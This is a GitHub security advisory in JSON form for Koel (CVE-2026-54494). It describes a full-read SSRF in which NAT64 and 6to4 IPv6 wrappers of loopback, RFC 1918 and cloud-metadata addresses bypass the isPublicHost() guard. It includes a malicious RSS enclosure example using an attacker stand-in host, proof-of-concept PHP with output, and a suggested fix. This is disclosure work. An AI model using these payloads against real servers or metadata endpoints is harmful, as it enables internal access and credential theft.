{"id":"GHSA-rjg7-r26h-cfp2","summary":"Koel: Full-read SSRF via podcast enclosure URL: isPublicHost() filter_var guard does not reject NAT64 (64:ff9b::/96) or 6to4 (2002::/16) IPv6-transition wrappers of internal IPv4","details":"## Summary\n\nKoel's outbound-URL guard `App\\Helpers\\Network::isPublicHost()` classifies an IP as \"public\" using PHP's `filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)`. That flag set does **not** recognise IPv6 transition-address forms that embed a private/loopback/link-local IPv4: NAT64 well-known prefix `64:ff9b::/96` (RFC 6052) and 6to4 `2002::/16` (RFC 3056). An address such as `64:ff9b::7f00:1` (= `127.0.0.1`), `64:ff9b::a9fe:a9fe` (= `169.254.169.254`, the cloud metadata endpoint), or `2002:a00:1::` (= `10.0.0.1`) is reported as a public address, so the guard returns `true` and Koel proceeds to fetch the URL.\n\nThe guard is the only SSRF defense in front of `App\\Values\\Podcast\\EpisodePlayable::createForEpisode()`, which downloads a podcast episode with `Http::sink($file)-\u003eget($url)` and streams the response body back to the requesting user. Because an attacker fully controls the `\u003cenclosure url\u003e` of any RSS feed they host (and any authenticated user can subscribe to a feed), they can publish an enclosure whose hostname has an `AAAA` record that is a NAT64/6to4 wrapper of an internal IP. On hosts with NAT64 or 6to4/dual-stack routing (the standard configuration on IPv6-only AWS/GCP subnets and 6to4-relayed networks), the kernel routes the wrapper to the embedded IPv4, and Koel performs a full-read SSRF against the internal endpoint — returning the response body to the attacker.\n\nThis is a server-side request forgery with full response disclosure (CWE-918) against internal services and cloud instance metadata.\n\n## Vulnerable code\n\n`app/Helpers/Network.php` — `isPublicHost()` (the literal-IP branch and the per-resolved-record branch use the identical predicate):\n\n```php\npublic function isPublicHost(string $host): bool\n{\n    if (filter_var($host, FILTER_VALIDATE_IP)) {\n        return (\n            filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false\n        );\n    }\n\n    try {\n        $records = array_merge(dns_get_record($host, DNS_A) ?: [], dns_get_record($host, DNS_AAAA) ?: []);\n    } catch (Throwable) {\n        return false;\n    }\n\n    if ($records === []) {\n        return false;\n    }\n\n    foreach ($records as $record) {\n        $ip = $record['ip'] ?? $record['ipv6'] ?? null;\n\n        if (\n            !$ip\n            || filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false\n        ) {\n            return false;\n        }\n    }\n\n    return true;\n}\n```\n\n`PHP`'s `FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE` rejects RFC 1918, loopback, link-local and IPv4-mapped IPv6 (`::ffff:a.b.c.d`), but treats NAT64 `64:ff9b::/96` and 6to4 `2002::/16` as ordinary global addresses — even though both forms deterministically embed an IPv4 the kernel will route to.\n\nThe sink, `app/Values/Podcast/EpisodePlayable.php` — `createForEpisode()`:\n\n```php\n$network = app(Network::class);\n$url = (string) $episode-\u003epath;\n\nif (!$network-\u003eisSafeUrl($url)) {            // isSafeUrl() -\u003e isPublicHost(), the only guard\n    throw UnsafeUrlException::forUrl($url);\n}\n\nHttp::sink($file)\n    -\u003ewithOptions([\n        'allow_redirects' =\u003e [\n            'max' =\u003e 5,\n            'on_redirect' =\u003e static function (\n                RequestInterface $request,\n                ResponseInterface $response,\n                UriInterface $uri,\n            ) use ($network): void {\n                if (!$network-\u003eisSafeUrl((string) $uri)) {   // same guard on redirects -\u003e same bypass\n                    throw UnsafeUrlException::forUrl((string) $uri);\n                }\n            },\n        ],\n    ])\n    -\u003eget($url)                              // full-read SSRF: response streamed into $file\n    -\u003ethrow();\n```\n\n`$episode-\u003epath` is the `\u003cenclosure url\u003e` from the subscribed podcast RSS feed. The redirect callback reuses the same `isSafeUrl()`, so a redirect to a NAT64/6to4 host is also accepted.\n\n## Attack scenario / How input reaches the sink\n\n1. Attacker hosts a podcast RSS feed and serves an item whose enclosure is `\u003cenclosure url=\"http://int.attacker.example/secret\" type=\"audio/mpeg\"/\u003e`, where `int.attacker.example` publishes `AAAA = 64:ff9b::a9fe:a9fe` (NAT64 wrapper of `169.254.169.254`) or `2002:a00:1::` (6to4 wrapper of `10.0.0.1`). The attacker may also use a bare IPv6-literal enclosure host directly.\n2. A Koel user subscribes to the feed (a standard, intended feature — the podcast subscription endpoint accepts an arbitrary feed URL) and plays / streams the episode.\n3. `EpisodePlayable::createForEpisode()` calls `isSafeUrl($url)`. The host resolves to the NAT64/6to4 address; `isPublicHost()` runs `filter_var(NO_PRIV_RANGE | NO_RES_RANGE)` over the embedded-IPv4 transition form and returns `true`.\n4. `Http::sink($file)-\u003eget($url)` connects. On a NAT64/dual-stack/6to4-routed host the kernel forwards to the embedded internal IPv4. The internal response body is written to `$file` and served back to the user — full-read SSRF against internal services / cloud IMDS.\n\n## Proof of concept\n\n### (a) Guard-predicate proof (PHP 8.5, the exact `filter_var` call)\n\n```php\n\u003c?php\nfunction isPublicHost_literal(string $ip): bool {        // koel Network::isPublicHost literal branch\n    if (!filter_var($ip, FILTER_VALIDATE_IP)) return false;\n    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;\n}\nforeach ([\n  ['NAT64(127.0.0.1)','64:ff9b::7f00:1'], ['NAT64(169.254.169.254 IMDS)','64:ff9b::a9fe:a9fe'],\n  ['NAT64(10.0.0.1)','64:ff9b::a00:1'],   ['6to4(127.0.0.1)','2002:7f00:1::'],\n  ['6to4(169.254.169.254)','2002:a9fe:a9fe::'], ['6to4(10.0.0.1)','2002:a00:1::'],\n  ['direct 127.0.0.1','127.0.0.1'], ['direct 10.0.0.1','10.0.0.1'],\n  ['direct 169.254.169.254','169.254.169.254'], ['IPv4-mapped ::ffff:10.0.0.1','::ffff:10.0.0.1'],\n] as [$l,$ip]) printf(\"%-30s %-22s passes_public=%s\\n\",$l,$ip,isPublicHost_literal($ip)?'YES(BYPASS)':'no(blocked)');\n```\n\nVerbatim output:\n\n```\nNAT64(127.0.0.1)               64:ff9b::7f00:1        passes_public=YES(BYPASS)\nNAT64(169.254.169.254 IMDS)    64:ff9b::a9fe:a9fe     passes_public=YES(BYPASS)\nNAT64(10.0.0.1)                64:ff9b::a00:1         passes_public=YES(BYPASS)\n6to4(127.0.0.1)                2002:7f00:1::          passes_public=YES(BYPASS)\n6to4(169.254.169.254)          2002:a9fe:a9fe::       passes_public=YES(BYPASS)\n6to4(10.0.0.1)                 2002:a00:1::           passes_public=YES(BYPASS)\ndirect 127.0.0.1               127.0.0.1              passes_public=no(blocked)\ndirect 10.0.0.1                10.0.0.1               passes_public=no(blocked)\ndirect 169.254.169.254         169.254.169.254        passes_public=no(blocked)\nIPv4-mapped ::ffff:10.0.0.1    ::ffff:10.0.0.1        passes_public=no(blocked)\n```\n\n### End-to-end reproduction against pinned koel v9.5.0\n\nEnvironment: `git clone --branch v9.5.0 https://github.com/koel/koel.git` + `composer install`, run inside a `php:8.5-cli` container started with `--cap-add=NET_ADMIN` so the NAT64 and 6to4 prefixes can be assigned to `lo`, simulating a NAT64/dual-stack host's kernel routing:\n\n```\nip -6 addr add 64:ff9b::7f00:1/128 dev lo    # NAT64 wrapper of 127.0.0.1 -\u003e loopback\nip -6 addr add 2002:7f00:1::/128 dev lo       # 6to4 wrapper of 127.0.0.1  -\u003e loopback\n```\n\nA localhost stand-in \"internal IMDS\" server listens on those literals and returns `SENTINEL_INTERNAL_IMDS_SECRET=ssrf-proven-token-koel-nat64`. The harness boots a real Laravel container, resolves the **genuine released** `App\\Helpers\\Network` (from `app/Helpers/Network.php`), invokes its real `isPublicHost()` on each attacker `AAAA`-record value, then runs the verbatim `EpisodePlayable::createForEpisode()` body (`isSafeUrl` guard, then `Http::sink($file)-\u003eget($url)` via Laravel's real Guzzle-backed client):\n\n```php\n$network = $app-\u003emake(App\\Helpers\\Network::class);   // resolved from app/Helpers/Network.php\n// STEP 1: genuine guard decision on the attacker AAAA-record value\nforeach ($aaaa as [$label,$ip]) echo $network-\u003eisPublicHost($ip) ? 'true' : 'false';\n// STEP 2: verbatim createForEpisode body\nif (!$network-\u003eisPublicHost($hostForGuard)) { /* REJECTED */ }\nelse { Http::sink($file)-\u003ewithOptions([...])-\u003eget($url); /* fetch + read body */ }\n```\n\nVerbatim output:\n\n```\nNetwork class (genuine released koel source): App\\Helpers\\Network\nResolved from: /app/app/Helpers/Network.php\nGuard predicate source (app/Helpers/Network.php isPublicHost):\n    filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)\n\n==== STEP 1 — genuine $network-\u003eisPublicHost() on attacker AAAA-record value (the only guard) ====\n  isPublicHost(64:ff9b::7f00:1     ) = true   [NAT64(127.0.0.1)  -\u003e loopback] expect=bypass-expected\n  isPublicHost(64:ff9b::a9fe:a9fe  ) = true   [NAT64(169.254.169.254) -\u003e AWS IMDS] expect=bypass-expected\n  isPublicHost(2002:a00:1::        ) = true   [6to4(10.0.0.1)   -\u003e RFC1918] expect=bypass-expected\n  isPublicHost(10.0.0.1            ) = false  [DIRECT RFC1918 10.0.0.1 (neg ctrl A)] expect=must-block\n  isPublicHost(::ffff:10.0.0.1     ) = false  [IPv4-mapped ::ffff:10.0.0.1 (neg B)] expect=must-block\n  isPublicHost(127.0.0.1           ) = false  [DIRECT loopback 127.0.0.1 (neg ctrl)] expect=must-block\n  isPublicHost(8.8.8.8             ) = true   [PUBLIC 8.8.8.8 (positive ctrl)] expect=must-allow\n\n==== STEP 2 — genuine EpisodePlayable fetch via Http::sink (real network) ====\n[IMDS-STANDIN HIT] local_addr_reached=[64:ff9b::7f00:1]:18099 peer=[64:ff9b::7f00:1]:37214 request_line=\"GET /secret HTTP/1.1\" Host: [64:ff9b::7f00:1]:18099\n  [NAT64 well-known of 127.0.0.1]\n    url=http://[64:ff9b::7f00:1]:18099/secret\n    guard=PASSED fetched=YES status=200\n    sink_body=SENTINEL_INTERNAL_IMDS_SECRET=ssrf-proven-token-koel-nat64\n[IMDS-STANDIN HIT] local_addr_reached=[2002:7f00:1::]:18099 peer=[2002:7f00:1::]:49654 request_line=\"GET /secret HTTP/1.1\" Host: [2002:7f00:1::]:18099\n  [6to4 of 127.0.0.1]\n    url=http://[2002:7f00:1::]:18099/secret\n    guard=PASSED fetched=YES status=200\n    sink_body=SENTINEL_INTERNAL_IMDS_SECRET=ssrf-proven-token-koel-nat64\n  [DIRECT RFC1918 10.0.0.1 (neg ctrl A)]\n    url=http://10.0.0.1:18099/secret\n    guard=REJECTED fetched=no status=-\n    sink_body=(none)\n\n==== E2E DONE ====\n```\n\nResult: both NAT64 and 6to4 enclosure URLs pass the genuine `isPublicHost`/`isSafeUrl` guard, the genuine `Http::sink()-\u003eget()` connects to the internal stand-in, and the internal response body (`SENTINEL_INTERNAL_IMDS_SECRET=...`) is read back — full-read SSRF.\n\n### Negative controls\n\n- `http://10.0.0.1` (direct RFC 1918) — guard `REJECTED`, no fetch (shown above).\n- `::ffff:10.0.0.1` (IPv4-mapped IPv6) and `127.0.0.1` / `169.254.169.254` (direct) — `isPublicHost(...) = false` (shown in STEP 1). The existing guard correctly blocks every form **except** the two transition wrappers, confirming the gap is specific to NAT64 `64:ff9b::/96` and 6to4 `2002::/16`.\n- `8.8.8.8` (public) — `isPublicHost(...) = true` (positive control: legitimate public hosts are unaffected by the proposed fix).\n\n## Impact\n\nFull-read SSRF (CWE-918). An authenticated user able to subscribe to a podcast feed they control can coerce the Koel server into issuing HTTP requests to internal services and reading the responses:\n\n- Cloud instance metadata (`http://[64:ff9b::a9fe:a9fe]/latest/meta-data/...`) — credential / IAM-role token theft on AWS/GCP/Azure.\n- Internal-only HTTP services (admin panels, databases with HTTP fronts, `localhost` daemons) reachable from the Koel host.\n\nPrecondition: the Koel host has NAT64 (`64:ff9b::/96`) or 6to4/dual-stack routing for the transition prefix — the default on IPv6-only AWS/GCP subnets (NAT64) and on 6to4-relayed dual-stack networks. This is the same host-precondition class under which the IPv4/IPv6-literal SSRF guard is meaningful at all.\n\n## Suggested fix\n\nIn `isPublicHost()`, before classifying an IP, normalise IPv6 transition forms by extracting the embedded IPv4 and re-running the private/reserved check on it, and additionally reject the transition prefixes outright. Concretely: for any IPv6 address, detect NAT64 (`64:ff9b::/96`, `64:ff9b:1::/48`), 6to4 (`2002::/16`), IPv4-mapped (`::ffff:0:0/96`, already covered by the flag but should be unwrapped for consistency), Teredo (`2001::/32`) and IPv4-compatible (`::/96`) wrappers, extract the embedded IPv4, and require it to pass `FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE` as well. The same unwrap must be applied to every IP resolved in the DNS branch. A fix PR implementing this (with regression tests over NAT64/6to4/Teredo/IPv4-compatible wrappers of loopback / RFC 1918 / link-local / IMDS plus public-host positive controls) is linked below.\n\n## Fix PR\n\nA fix is provided via a private fork PR against the advisory's temporary fork (linked from the advisory's \"Collaborators\" / fix workflow). It adds an `extractEmbeddedIpv4()` helper covering IPv4-mapped, IPv4-compatible, 6to4, NAT64 well-known and NAT64-discovery forms, recurse-checks the embedded IPv4 against the existing `NO_PRIV_RANGE | NO_RES_RANGE` predicate in both the literal-IP and per-resolved-record branches of `isPublicHost()`, and adds regression tests.\n\n## Credit\n\nReported by tonghuaroot.","aliases":["CVE-2026-54494"],"modified":"2026-07-15T18:41:49.319835Z","published":"2026-07-15T18:21:39Z","database_specific":{"github_reviewed_at":"2026-07-15T18:21:39Z","nvd_published_at":null,"cwe_ids":["CWE-918"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/koel/koel/security/advisories/GHSA-rjg7-r26h-cfp2"},{"type":"WEB","url":"https://github.com/koel/koel/pull/2549"},{"type":"WEB","url":"https://github.com/koel/koel/commit/5f6ce2cefd08f437a269236b677ad971517ccbb6"},{"type":"PACKAGE","url":"https://github.com/koel/koel"},{"type":"WEB","url":"https://github.com/koel/koel/releases/tag/v9.7.1"}],"affected":[{"package":{"name":"phanan/koel","ecosystem":"Packagist","purl":"pkg:composer/phanan/koel"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"9.7.1"}]}],"versions":["1.0.0-beta","v0.0.0-beta","v1.1.1","v1.1.2","v2.0.0","v2.0.1","v2.0.2","v2.1.0","v2.2.0","v2.2.1","v3.0.0","v3.0.1","v3.1.0","v3.1.1","v3.2.0","v3.3.0","v3.3.1","v3.4.0","v3.4.1","v3.5.0","v3.5.1","v3.5.2","v3.5.3","v3.5.4","v3.5.5","v3.6.0","v3.6.1","v3.6.2","v3.7.0","v3.7.1","v3.7.2","v4.0.0","v4.1.0","v4.1.1","v4.2.0","v4.2.1","v4.2.2","v4.3.0","v4.3.1","v4.4.0","v5.0.0","v5.0.1","v5.0.2","v5.1.0","v5.1.1","v5.1.10","v5.1.11","v5.1.12","v5.1.13","v5.1.14","v5.1.2","v5.1.3","v5.1.4","v5.1.5","v5.1.6","v5.1.7","v5.1.8","v5.1.9","v6.0.0","v6.0.1","v6.0.2","v6.0.3","v6.0.4","v6.0.5","v6.0.6","v6.1.0","v6.10.0","v6.11.0","v6.11.1","v6.11.2","v6.11.3","v6.11.4","v6.11.5","v6.12.0","v6.12.1","v6.2.0","v6.2.1","v6.2.2","v6.3.0","v6.4.0","v6.4.1","v6.4.2","v6.4.3","v6.5.0","v6.5.1","v6.5.2","v6.5.3","v6.6.0","v6.7.0","v6.7.1","v6.7.2","v6.7.3","v6.7.4","v6.7.5","v6.8.0","v6.8.1","v6.8.2","v6.8.3","v6.8.4","v6.8.5","v6.9.0","v7.0.0","v7.0.1","v7.0.10","v7.0.11","v7.0.12","v7.0.2","v7.0.3","v7.0.4","v7.0.5","v7.0.6","v7.0.7","v7.0.8","v7.0.9","v7.1.0","v7.10.0","v7.10.1","v7.10.2","v7.10.3","v7.10.4","v7.11.0","v7.12.0","v7.13.0","v7.14.0","v7.15.0","v7.15.1","v7.2.0","v7.2.1","v7.2.2","v7.3.0","v7.3.1","v7.4.0","v7.4.1","v7.4.2","v7.5.0","v7.5.1","v7.5.2","v7.6.0","v7.6.1","v7.6.2","v7.6.3","v7.7.0","v7.7.1","v7.8.0","v7.8.1","v7.9.0","v8.0.0","v8.1.0","v8.2.0","v8.3.0","v8.3.1","v9.0.0","v9.1.0","v9.1.1","v9.1.2","v9.2.0","v9.2.1","v9.3.0","v9.3.1","v9.3.2","v9.3.3","v9.3.4","v9.3.5","v9.3.6","v9.4.0","v9.4.1","v9.4.2","v9.5.0","v9.6.0","v9.7.0"],"database_specific":{"last_known_affected_version_range":"\u003c= 9.7.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-rjg7-r26h-cfp2/GHSA-rjg7-r26h-cfp2.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"}]}